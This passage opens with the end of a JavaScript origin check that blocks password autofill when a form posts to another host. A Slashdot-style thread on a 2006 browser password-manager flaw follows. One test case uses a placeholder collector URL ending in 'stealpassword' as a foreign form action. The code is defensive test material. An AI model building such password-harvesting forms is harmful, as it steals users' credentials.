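    if (target.origin !== new URL(savedLogin.submitUrl).origin) {
      return { fill: false, reason: "action posts to another origin" };
    }
    return { fill: true, reason: "page and action match" };
  } catch (e) {
    return { fill: false, reason: "unparseable URL" };
  }
}

// Constructed sample data (the .test hosts are placeholders).
const savedLogin = {
  pageUrl: "https://social.example.test/login",
  submitUrl: "https://social.example.test/login",
};
const cases = [
  ["real login form", "https://social.example.test/login?next=/home", "#"],
  ["profile page, same domain", "https://social.example.test/profiles/1234", "#"],
  ["login page, foreign action", "https://social.example.test/login",
    "http://collector.example.test/stealpassword"],
];

function runCases() {
  return cases.map(([label, page, action]) =>
    ({ label, ...shouldAutofill(savedLogin, page, action) }));
}

for (const r of runCases()) {
  console.log(`${r.label}: ${r.fill ? "fill" : "refuse"} (${r.reason})`);
}
```

The third case mirrors the two-form test case posted earlier in the thread: same page as the saved login, but the form's action points at another host, so the page-URL check alone would not catch it.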

Re:Sounds more like a bug in myspace (1)

bwy (726112) | more than 7 years ago | (#16942508)

Allowing full html coding, including embedding java or javascript, is an invitation for the unscrupulous. That's one of the 500 reasons I can think of to never visit a website like myspace.

I don't think your logic makes sense. Any scammer out there can get a nearly free hosting plan and upload whatever content they want. Using your logic, you'd never visit any web site created by anyone. You'd certainly never click a link on Google because you have no way of knowing what is on the other end (and you'd only feel "safe" when you could be sure the content on the other end was created with some locked down UI?)

Re:Sounds more like a bug in myspace (2, Informative)

Bogtha (906264) | more than 7 years ago | (#16942644)

Any scammer out there can get a nearly free hosting plan and upload whatever content they want.

Yes, but that's not a problem because they aren't on a domain where you have a saved password. The problem here is that random people can upload content to, say, myspace.com, and if you have a password for myspace.com, your browser will automatically fill their form in. When an attacker uploads something to attacker.example.com, you aren't going to care because you don't have a saved password for attacker.example.com.

Re:Sounds more like a bug in myspace (0)

Anonymous Coward | more than 7 years ago | (#16942726)

FYI, Myspace doesn't allow javascript anymore. Posting anonymous for obvious reasons...

That is Scary (2, Informative)

EricJ2190 (1016652) | more than 7 years ago | (#16942084)

That is disturbing to me since I use FF2 to store many of my passwords. However, I don't store passwords for more critical sites, like my bank's website. I recommend others do the same.

Re:That is Scary (0)

Anonymous Coward | more than 7 years ago | (#16942328)

That is because the bank's site doesn't allow you to do so... unless bank in shitty bank.

Waiting for FF 3.0 (1)

tcolberg (998885) | more than 7 years ago | (#16942148)

I am still using FF1.5 because of all the problems with 2.0. Not just bugs like these, although they are disappointing, but reports of the ever present memory leak and the annoying revamps to the tabs bar. Then again, I am eagerly looking forward to upgrade to a better version so I can get some of the improvements, like crash restoration.

Re:Waiting for FF 3.0 (1)

Mattwolf7 (633112) | more than 7 years ago | (#16942502)

Firefox 2 can have Firefox 1.5 tabs - Browser.tabs.closeButtons: 3 [mozillazine.org]
Memory seems better in FF2 to me

And this bug is present in all versions of FF and IE...

No, No, No, This is impossible... (0)

Anonymous Coward | more than 7 years ago | (#16942182)

FireFox is OpenSource so it is impossible for it to have bugs let alone security problems. Only Windows has security problems. Buy a Mac - it has no problems and is perfect.

The patch... (1)

alyawn (694153) | more than 7 years ago | (#16942216)

And where's the patch for this? If the bug was hidden from all, then why would they go public with it without a patch? And why would they hide it in the first place? Open source developers could have submitted patches already!

no need to save passwords --generate em on the fly (4, Interesting)

caseih (160668) | more than 7 years ago | (#16942278)

There is a neat little piece of javascript at http://www.xs4all.nl/~jlpoutre/BoT/Javascript/PasswordComposer/ [xs4all.nl] that lets you just think up a master password in your head and then use this applet to automatically generate a site-specific, unique hash and fill in the password field automatically. This way you can remember the passwords easily, you never have to save them or write them down. And if one site gets compromised, that password (the hash) won't work with any other site. The drawback is that if you don't have this piece of javascript then you can't get into your sites.

Obligatory disclaimer! (2, Funny)

FaustIN (1030298) | more than 7 years ago | (#16942342)

Aha!... that's why sometimes I don't remember posting bad language comments!

Thought until now of multiple personality but mystery solved! It was just my browser!...

PS: I shall not be held accountable for ANY of my comments...

Any Password?? (1)

er824 (307205) | more than 7 years ago | (#16942350)

After reading TFA and the bugzilla report it sounds like this bug does not allow ANY password stored in the password manager to be stolen as some people seem to be assuming. It sounds like only passwords for sites that allow user generated HTML to contain input fields are at risk.

If it affects Firefox and Internet Explorer... (2, Interesting)

ewl1217 (922107) | more than 7 years ago | (#16942362)

Does anyone know if Konqueror (using KDE Wallet) is affected? And what about other browsers, like Opera, Epiphany, and so on? I'd just like to know how common this type of exploit is.

software level bug (1)

HAL9000_mirror (1029222) | more than 7 years ago | (#16942576)

While I agree FF should alert the user, this is not a hole in FF's security architecture. It's rather a software level bug. Moral of the story: 1. don't be lazy and ask your browser to remember your password. 2. if you insist on being lazy, store passwords only for trivial web accounts.

My 2 cents (0)

Inferger (1007151) | more than 7 years ago | (#16942598)

I never have Firefox nor any browser for that matter keep passwords to information that might compromise my identity. Unless identity thieves want to play sockpuppet with a forum account I don't think there's anything of interest. If people used common sense and not remember extremely important passwords like the one for your PayPal account you would never hear of this kind of problem being a problem.

WARNING (3, Informative)

tezbobobo (879983) | more than 7 years ago | (#16942732)

DEERPARK 1.5.0.4 is also vulnerable - based on firefox 1.5